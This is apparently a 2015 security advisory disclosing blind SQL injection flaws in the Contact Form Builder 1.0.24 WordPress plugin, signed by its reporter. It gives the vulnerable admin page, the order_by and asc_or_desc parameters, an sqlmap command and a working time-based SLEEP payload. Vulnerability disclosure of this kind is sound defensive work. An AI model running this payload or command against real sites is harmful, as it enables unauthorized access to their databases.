Subject: Blind SQL injections in Contact Form Builder 1.0.24
Date: Tue, 7 Jul 2015 12:14:52 +0200


Plugin: Contact Form Builder 1.0.24 

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).

1. SQL injection (CFMModelBlocked_ips_cfm::get_rows_data())

Method: POST
Url: http://localhost/wp-admin/admin.php?page=blocked_ips_cfm
Parameters: order_by, asc_or_desc

Example PHP callstack:

  CFMModelBlocked_ips_cfm::get_rows_data   [/contact-form-builder/admin/models/CFMModelBlocked_ips_cfm.php:33]

Sqlmap verification: 

sqlmap --cookie "..." --dbms mysql --method POST --data "order_by=ip&asc_or_desc=asc" -u http://localhost/wp-admin/admin.php?page=blocked_ips_cfm -p order_by

Parameter: order_by (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: order_by=ip AND (SELECT * FROM (SELECT(SLEEP(5)))sUkE)&asc_or_desc=asc

Please note that there have to be at least 1 record in wp_contactformmaker_blocked table to succesfully execute sqlmap payloads.

2. SQL injection (CFMModelManage_cfm::get_rows_data())

Analogical to #1 SQL injection, both methods are almost identical.


Marcin Probola,